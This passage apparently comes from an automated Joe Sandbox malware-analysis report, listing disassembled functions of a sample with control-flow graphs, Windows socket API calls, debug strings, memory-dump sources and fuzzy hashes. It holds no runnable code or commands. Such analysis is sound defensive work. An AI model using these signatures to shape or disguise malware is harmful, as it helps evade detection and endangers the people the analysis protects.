                                  control_flow_graph 1605 459290-4592ed call 4276a0 1608 4593c3-4593ce 1605->1608 1609 4592f3-4592fb 1605->1609 1618 4593e5-459427 call 43d090 call 464f40 1608->1618 1619 4593d0-4593e1 1608->1619 1610 459301-459333 call 43d8c0 call 43d9a0 1609->1610 1611 4593aa-4593af 1609->1611 1630 459335-459364 WSAIoctl 1610->1630 1631 4593a7 1610->1631 1612 4593b5-4593bc 1611->1612 1613 459456-459470 1611->1613 1616 4593be 1612->1616 1617 459429-459431 1612->1617 1616->1613 1624 459433-459437 1617->1624 1625 459439-45943f 1617->1625 1618->1613 1618->1617 1619->1612 1621 4593e3 1619->1621 1621->1613 1624->1613 1624->1625 1625->1613 1626 459441-459453 call 4650a0 1625->1626 1626->1613 1634 459366-45936f 1630->1634 1635 45939b-4593a4 1630->1635 1631->1611 1634->1635 1637 459371-459390 setsockopt 1634->1637 1635->1631 1637->1635 1638 459392-459395 1637->1638 1638->1635
                                  APIs
                                  • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0045935D
                                  • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00459389
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: Ioctlsetsockopt
                                  • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                  • API String ID: 1903391676-2691795271
                                  • Opcode ID: c00d663447ef69122cf068f0e5d5dc3b68654232f4da6ca11a358f1111728e2e
                                  • Instruction ID: 7efa4600ac6160c336be36b1d2476dd3ab43e04f350f26f449d0bc337cb71845
                                  • Opcode Fuzzy Hash: c00d663447ef69122cf068f0e5d5dc3b68654232f4da6ca11a358f1111728e2e
                                  • Instruction Fuzzy Hash: 6651AE70A04305EBDB14DF24C881BAAB7A5EF89318F14852AFD488B382E734ED55C795
                                  Function 00427770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1639 427770-42778e 1640 427790-427797 1639->1640 1641 4277b6-4277c2 recv 1639->1641 1640->1641 1642 427799-4277a1 1640->1642 1643 4277c4-4277d9 call 4272a0 1641->1643 1644 42782e-427832 1641->1644 1645 4277a3-4277b4 1642->1645 1646 4277db-427829 call 4272a0 call 42cb20 call 7a8c50 1642->1646 1643->1644 1645->1643 1646->1644
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: recv
                                  • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                  • API String ID: 1507349165-640788491
                                  • Opcode ID: ac727cf1f57325512b6bf799a4e3b1dad96c43bb32c400515f597081c57a1890
                                  • Instruction ID: 12134daa455c7b320e5e93aa20d2f2b1b52c97b8c3839c210faf31599e6f4b21
                                  • Opcode Fuzzy Hash: ac727cf1f57325512b6bf799a4e3b1dad96c43bb32c400515f597081c57a1890
                                  • Instruction Fuzzy Hash: F81157B1F083647BD110AB18BC4EE27BB5CDBCAB2CF81051DB80453342DA25AC0089F7
                                  Function 004275E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1658 4275e0-4275ed 1659 427607-427629 socket 1658->1659 1660 4275ef-4275f6 1658->1660 1662 42762b-42763c call 4272a0 1659->1662 1663 42763f-427642 1659->1663 1660->1659 1661 4275f8-4275ff 1660->1661 1664 427643-427699 call 4272a0 call 42cb20 call 7a8c50 1661->1664 1665 427601-427602 1661->1665 1662->1663 1665->1659
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: socket
                                  • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                  • API String ID: 98920635-842387772
                                  • Opcode ID: 03ef6ba0bbdc5b7744f5a3e821c61eb9be3ea560ef16214b1850bfd27d30cfae
                                  • Instruction ID: bf3dbdb7828ef0d904a31d59b6b7a50ea17542e8cbfed3035546d37d02b00492
                                  • Opcode Fuzzy Hash: 03ef6ba0bbdc5b7744f5a3e821c61eb9be3ea560ef16214b1850bfd27d30cfae
                                  • Instruction Fuzzy Hash: 61115971B0476267D610566D7C4AF8B7B44DBC6738F844519F41093292D7168850CAE2
                                  Function 007A8E90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1767 7a8e90-7a8eb8 _open 1768 7a8eba-7a8ec7 1767->1768 1769 7a8eff-7a8f2c call 7a9f70 1767->1769 1771 7a8ec9 1768->1771 1772 7a8ef3-7a8efa call 7a8d20 1768->1772 1779 7a8f39-7a8f51 call 7a8ca8 1769->1779 1775 7a8ecb-7a8ecd 1771->1775 1776 7a8ee2-7a8ef1 1771->1776 1772->1769 1777 7a8ed3-7a8ed6 1775->1777 1778 8de980-8de997 1775->1778 1776->1771 1776->1772 1777->1776 1782 7a8ed8 1777->1782 1780 8de999 1778->1780 1781 8de99a-8de9c1 1778->1781 1786 7a8f53-7a8f5e call 7a8cc0 1779->1786 1787 7a8f30-7a8f37 1779->1787 1785 8de9c9-8de9cf 1781->1785 1782->1776 1788 8de9e9-8dea0b 1785->1788 1789 8de9d1-8de9df 1785->1789 1786->1768 1787->1779 1787->1786 1794 8dea0d-8dea14 1788->1794 1795 8dea16-8dea2b 1788->1795 1791 8de9e5-8de9e8 1789->1791 1794->1795 1796 8dea2d-8dea42 1794->1796 1795->1789 1796->1791
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: _open
                                  • String ID: terminated$@
                                  • API String ID: 4183159743-3016906910
                                  • Opcode ID: f37ac5d5ecc254aa7c970d98903e97f3b3ccf0fba15a93a2de3328a9735f18f5
                                  • Instruction ID: afbb72d46db781589abb1418c62abb70421255ce80ec568b1a4ab8c1a3789370
                                  • Opcode Fuzzy Hash: f37ac5d5ecc254aa7c970d98903e97f3b3ccf0fba15a93a2de3328a9735f18f5
                                  • Instruction Fuzzy Hash: 07414CB0909305DECB50EF79C444A6EBBE4FB89314F408A2DE898D7381E738D905CB56
                                  Function 0045A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1799 45a150-45a159 1800 45a250 1799->1800 1801 45a15f-45a17b 1799->1801 1802 45a181-45a1ce getsockname 1801->1802 1803 45a249-45a24f 1801->1803 1804 45a1f7-45a214 call 45ef30 1802->1804 1805 45a1d0-45a1f5 call 43d090 1802->1805 1803->1800 1804->1803 1809 45a216-45a23b call 43d090 1804->1809 1812 45a240-45a246 call 464f40 1805->1812 1809->1812 1812->1803
                                  APIs
                                  • getsockname.WS2_32(?,?,00000080), ref: 0045A1C7
                                  Strings
                                  • getsockname() failed with errno %d: %s, xrefs: 0045A1F0
                                  • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0045A23B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                  • API String ID: 3358416759-2605427207
                                  • Opcode ID: 265e211df504007b1f094a9b0c9618d595af669028f262d866140d5cef2e0ee4
                                  • Instruction ID: a9944d27c5ec4aea15d322b927364b66ed50a822e9699e2da9bf6dfbd03cbd0f
                                  • Opcode Fuzzy Hash: 265e211df504007b1f094a9b0c9618d595af669028f262d866140d5cef2e0ee4
                                  • Instruction Fuzzy Hash: 5F212831808280AAE7259B19EC47FE773BCEFD1328F000655FD8853152FA36599987E7
                                  Function 0043D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1819 43d5e0-43d5ee 1820 43d652-43d662 WSAStartup 1819->1820 1821 43d5f0-43d604 call 43d690 1819->1821 1822 43d670-43d676 1820->1822 1823 43d664-43d66f 1820->1823 1827 43d606-43d614 1821->1827 1828 43d61b-43d651 call 447620 1821->1828 1822->1821 1825 43d67c-43d68d 1822->1825 1827->1828 1833 43d616 1827->1833 1833->1828
                                  APIs
                                  • WSAStartup.WS2_32(00000202), ref: 0043D65B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: Startup
                                  • String ID: if_nametoindex$iphlpapi.dll
                                  • API String ID: 724789610-3097795196
                                  • Opcode ID: 853f9f10f64c5b25f43ec59d84c027e69dabd8623e70e28b12244563401dae6c
                                  • Instruction ID: b01336b1fb9a3779cc5f5d8fb9103affd8145c15b4ccb3e56720996dd3ef8639
                                  • Opcode Fuzzy Hash: 853f9f10f64c5b25f43ec59d84c027e69dabd8623e70e28b12244563401dae6c
                                  • Instruction Fuzzy Hash: 14012BD0D4034056F711BB38AD1BB6735D45F5D304F85246DE868923D2FB6CC598C257
                                  Function 004EAA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1835 4eaa30-4eaa64 1837 4eaa6a-4eaaa7 call 4de730 1835->1837 1838 4eab04-4eab09 1835->1838 1842 4eab0e-4eab13 1837->1842 1843 4eaaa9-4eaabd 1837->1843 1839 4eae80-4eae89 1838->1839 1844 4eae2e 1842->1844 1845 4eaabf-4eaac7 1843->1845 1846 4eab18-4eab50 1843->1846 1847 4eae30-4eae4a call 4dea60 call 4debf0 1844->1847 1845->1844 1848 4eaacd-4eab02 1845->1848 1851 4eab58-4eab6d 1846->1851 1860 4eae4c-4eae57 1847->1860 1861 4eae75-4eae7d 1847->1861 1848->1851 1854 4eab6f-4eab73 1851->1854 1855 4eab96-4eabab socket 1851->1855 1854->1855 1857 4eab75-4eab8f 1854->1857 1855->1844 1859 4eabb1-4eabc5 1855->1859 1857->1859 1873 4eab91 1857->1873 1862 4eabc7-4eabca 1859->1862 1863 4eabd0-4eabed ioctlsocket 1859->1863 1865 4eae6e-4eae6f 1860->1865 1866 4eae59-4eae5e 1860->1866 1861->1839 1862->1863 1867 4ead2e-4ead39 1862->1867 1868 4eabef-4eac0a 1863->1868 1869 4eac10-4eac14 1863->1869 1865->1861 1866->1865 1876 4eae60-4eae6c 1866->1876 1874 4ead3b-4ead4c 1867->1874 1875 4ead52-4ead56 1867->1875 1868->1869 1881 4eae29 1868->1881 1870 4eac16-4eac31 1869->1870 1871 4eac37-4eac41 1869->1871 1870->1871 1870->1881 1878 4eac7a-4eac7e 1871->1878 1879 4eac43-4eac46 1871->1879 1873->1844 1874->1875 1874->1881 1880 4ead5c-4ead6b 1875->1880 1875->1881 1876->1861 1886 4eace7-4eacfe 1878->1886 1887 4eac80-4eac9b 1878->1887 1883 4eac4c-4eac51 1879->1883 1884 4ead04-4ead08 1879->1884 1888 4ead70-4ead78 1880->1888 1881->1844 1883->1884 1891 4eac57-4eac78 1883->1891 1884->1867 1890 4ead0a-4ead28 1884->1890 1886->1884 1887->1886 1892 4eac9d-4eacc1 1887->1892 1893 4ead7a-4ead7f 1888->1893 1894 4eada0-4eadb2 connect 1888->1894 1890->1867 1890->1881 1897 4eacc6-4eacd7 1891->1897 1892->1897 1893->1894 1895 4ead81-4ead99 1893->1895 1896 4eadb3-4eadcf 1894->1896 1895->1896 1904 4eae8a-4eae91 1896->1904 1905 4eadd5-4eadd8 1896->1905 1897->1881 1903 4eacdd-4eace5 1897->1903 1903->1884 1903->1886 1904->1847 1906 4eadda-4eaddf 1905->1906 1907 4eade1-4eadf1 1905->1907 1906->1888 1906->1907 1908 4eae0d-4eae12 1907->1908 1909 4eadf3-4eae07 1907->1909 1910 4eae1a-4eae1c call 4eaf70 1908->1910 1911 4eae14-4eae17 1908->1911 1909->1908 1915 4eaea8-4eaead 1909->1915 1914 4eae21-4eae23 1910->1914 1911->1910 1916 4eae25-4eae27 1914->1916 1917 4eae93-4eae9d 1914->1917 1915->1847 1916->1847 1918 4eaeaf-4eaeb1 call 4de760 1917->1918 1919 4eae9f-4eaea6 call 4de7c0 1917->1919 1923 4eaeb6-4eaebe 1918->1923 1919->1923 1924 4eaf1a-4eaf1f 1923->1924 1925 4eaec0-4eaedb call 4de180 1923->1925 1924->1847 1925->1847 1928 4eaee1-4eaeec 1925->1928 1929 4eaeee-4eaeff 1928->1929 1930 4eaf02-4eaf06 1928->1930 1929->1930 1931 4eaf0e-4eaf15 1930->1931 1932 4eaf08-4eaf0b 1930->1932 1931->1839 1932->1931
                                  APIs
                                  • socket.WS2_32(FFFFFFFF,?,00000000), ref: 004EAB9B
                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 004EABE4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: ioctlsocketsocket
                                  • String ID:
                                  • API String ID: 416004797-0
                                  • Opcode ID: d8868d69830b5b1448c0694ad73a5fc4849b01a3cdc49b4465767a7d19db2bc2
                                  • Instruction ID: 5fa1b6adfc0c6a48014d0b37da137b1236d600a3234040517d37a60688c283cb
                                  • Opcode Fuzzy Hash: d8868d69830b5b1448c0694ad73a5fc4849b01a3cdc49b4465767a7d19db2bc2
                                  • Instruction Fuzzy Hash: 33E1E3706003819FEB20CF2AC885B6B77A5EF85305F144A2EF9988B391D779E854CB57
                                  Function 004278B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: closesocket
